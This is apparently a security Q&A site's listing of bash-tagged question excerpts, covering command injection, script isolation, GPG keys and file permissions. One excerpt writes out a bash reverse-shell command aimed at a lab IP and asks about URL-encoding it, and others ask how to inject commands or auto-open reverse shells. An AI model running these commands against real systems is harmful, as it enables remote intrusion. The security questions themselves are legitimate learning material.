Questions tagged [bash]
The Bourne-again shell (Bash) is a Unix shell. It lets the user run commands on the host machine through a text-based program. Questions using this tag should be related either to vulnerabilities of bash or to the proper use of specific commands.
163 questions
5 votes
3 answers
1k views
Are these bash lines (handling untrusted user input) vulnerable to command injection?
If $1 contains untrusted user input, for example $(whoami), are any of the following bash examples vulnerable to command injection? I'm having issues clearly understanding this behavior in Bash. Also, ...
0 votes
0 answers
51 views
Benefit to reading sensitive file chunks via a "middleman" shell script?
TL;DR: Is using a script spawned by my main process, which reads only a chunk of a sensitive file and then passes the result to my main process, of any benefit, in contrast to loading the file in my ...
3 votes
2 answers
251 views
Is this code vulnerable to injection?
I'm reviewing code which apparently ignores all security standards but doesn't seem to be exploitable due to its peculiar construction. The first stage is a Java Spring application and the name ...
0 votes
0 answers
40 views
Python os.system() does not change EUID to 0, but os.execl() does, why? [duplicate]
I was working on a Capture the Flag (CTF) challenge that involved a setuid-enabled binary, '/usr/bin/python', where the owner is 'root.' I assumed the user was "www-data", with UID=33. The ...
0 votes
0 answers
295 views
How to exploit read -p in a bash script
I want to execute the ls command instead of the output being "your name is ls". Is there a way to do it? read -p "name??" name echo "your name is $name"
0 votes
0 answers
1k views
Bash reverse shell as a URL parameter value
I am trying to put a bash reverse shell in a URL parameter value. The command is as follows: bash -i >& /dev/tcp/192.168.56.105/4444 0>&1 I have encoded the above code with URL encoding bash%20-i%20%...
0 votes
1 answer
186 views
Auto-opening a reverse bash shell
Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
4 votes
1 answer
240 views
GPG allows importing an invalid secp256k1 public key
I came across a PGP public key that seems invalid. The key is a secp256k1 public key that is supported by GPG. In fact, GPG allows importing that key even if it has an invalid secp256k1 public key inside....
1 vote
1 answer
3k views
Doing a diff between two keystore files
I have a keystore file with certificates and I want to compare if the second keystore has exactly the same contents as the first one. One approach would be to extract the certificates using keytool ...
0 votes
0 answers
134 views
How to isolate a bash script process?
I have a bash script that opens various random files that could be anything (PDF, xlsx, MKV, MP4, WebM, html). Since I don't fully trust the source of these files, there is a chance that some of them ...
1 vote
0 answers
1k views
How can you perform OS Command Injection when single-quotes are filtered?
While attempting OS Command Injection on a url.com/?ping= parameter, I see that all single quotes ' are being escaped and replaced by \\'. This is problematic because whenever you submit a value to ?...
-1 votes
1 answer
129 views
How can I grep only subdomain names without "target.com"? [closed]
I have a wordlist of subdomains that contains entries like this: admin.bugbountytarget.com portal.bugbountytarget.com sales.bugbountytarget.com vpn1.bugbountytarget.com dev.test.bugbountytarget.com ... And I ...
0 votes
1 answer
399 views
bash: how to securely source a script from an environment variable
Say I want to do source $VIRTUAL_ENV/bin/activate in my bashrc whenever the VIRTUAL_ENV is defined. In general, the idea of running a script pointed to by an environment variable seems a bit fishy as it ...
1 vote
1 answer
196 views
What scenarios does calling `clear` at the end of an ssh session protect against?
I have noticed that some server configurations put a clear command in the default ~/.bash_logout file, also with the comment "Clear the screen for security's sake". I can see that this ...
7 votes
2 answers
2k views
/opt and sudo unzip to /opt, is it safe?
Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put ...